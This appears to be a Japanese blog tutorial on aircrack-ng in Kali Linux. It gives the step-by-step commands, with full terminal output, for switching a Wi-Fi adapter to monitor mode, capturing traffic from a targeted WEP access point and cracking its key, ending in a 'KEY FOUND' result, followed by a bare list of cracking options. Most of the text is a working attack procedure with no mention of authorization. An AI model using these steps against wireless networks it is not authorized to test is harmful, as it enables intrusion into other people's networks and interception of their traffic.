ハッカーはaircrack-ngで無線LANの解析を確認する(Kali Linux)
「ハッカーはaircrack-ngで無線LANのパスワード解析を確認する(Kali Linux)」
目次
aircrack-ngとは
機能
- モニタリング パケットキャプチャーとテキストファイルへのデータ出力(サードパーティ製ツールでの処理用
- 攻撃の方法 パケットインジェクションによるリプレイアタック、認証解除、偽装アクセスポイントなどの攻撃
- テスト WiFiカードやドライバーの性能確認(キャプチャとインジェクション)
- クラッキング WEPおよびWPA PSK(WPA 1および2)の解読
ツールの場所
ツールと使用方法
// wifiアダプターをモニターモードに変更
┌──(root--localhost)-[/home/kali]
└─# airmon-ng start wlan0
// 周辺のAPのパケットを収集
┌──(root--localhost)-[/home/kali]
└─# airodump-ng wlan0mon
CH 6 ][ Elapsed: 6 s ][ 2021-10-08 15:05
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FF:FF:FF:FF:FF:FF -62 4 0 0 7 270 WPA2 CCMP PSK xxxxx-xxxxxx-g
FF:FF:FF:FF:FF:FE -62 5 0 0 7 54e WEP WEP xxxxx-xxxxxx-gw
// 調査するターゲートの情報だけ表示する。
┌──(root--localhost)-[/home/kali]
└─# airodump-ng --bssid FF:FF:FF:FF:FF:FE --channel 7 -w sample wlan0mon
15:10:58 Created capture file "asmple-01.cap".
CH 7 ][ Elapsed: 36 mins ][ 2021-10-08 15:47
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FF:FF:FF:FF:FF:FE -63 50 20872 185246 7 7 54e WEP WEP OPN xxxxx-xxxxxx-gw
// パスワードをクラックする。
┌──(kali--localhost)-[~]
└─$ aircrack-ng sample-01.cap
Reading packets, please wait...
Opening sample-01.cap
Read 50561 packets.
Got 18779 out of 15000 IVsStarting PTW attack with 18779 ivs.
# BSSID ESSID Encryption
1 FF:FF:FF:FF:FF:FE xxxxx-xxxxxx-gw WEP (18779 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening sample-01.cap
Read 50561 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
:
:
Aircrack-ng 1.6
[00:08:24] Tested 820 keys (got 54591 IVs)
Got 50002 out of 50000 IVsStarting PTW attack with 50002 ivs.
KB depth byte(vote)
0 0/ 13 39(70144) 6D(65792) 0D(64256) 6C(64000) 22(63488) 70(63488)
1 0/ 1 F5(76288) 3D(63488) 92(62976) 4A(62720) 7F(61952) 98(61696)
2 17/ 2 F8(60416) C3(60160) D0(60160) F2(60160) FD(60160) 94(59904)
3 0/ 1 9A(77056) AB(62976) 1E(62720) C0(61696) 43(61440) C7(61184)
4 2/ 4 FE(62976) 08(62720) 26(62720) 80(61952) E9(61440) A9(60928)
KEY FOUND! [ 31:66:66:35:66:34:31:37:61:35:62:39:38 ] (ASCII: zzzzzzzz4e3b8 )
Decrypted correctly: 100%
オプション(Common options)
-a <amode>
-e <essid>
-b <bssid>
-p <nbcpu>
-q
-C <macs>
-l <file>
オプション(Static WEP cracking options)
-c
-t
-h
-d <mask>
-m <maddr>
-n <nbits>
-i <index>
-f <fudge>
-k <korek>
-x or -x0
-x1
-x2
-X
-y
-K
-s
-M <num>
-D
-P <num>
-1
-V
オプション(WEP and WPA-PSK cracking options)
-w <words>
-N <file>
-R <file>
オプション(WPA-PSK options)
-E <file>
-j <file>
-J <file>
-S
-Z <sec>
-r <DB>
SIMD selection:
–simd-list
–simd=<option>
オプション(Other options)
-u
–help
YouTubeに最新動画を掲載しました。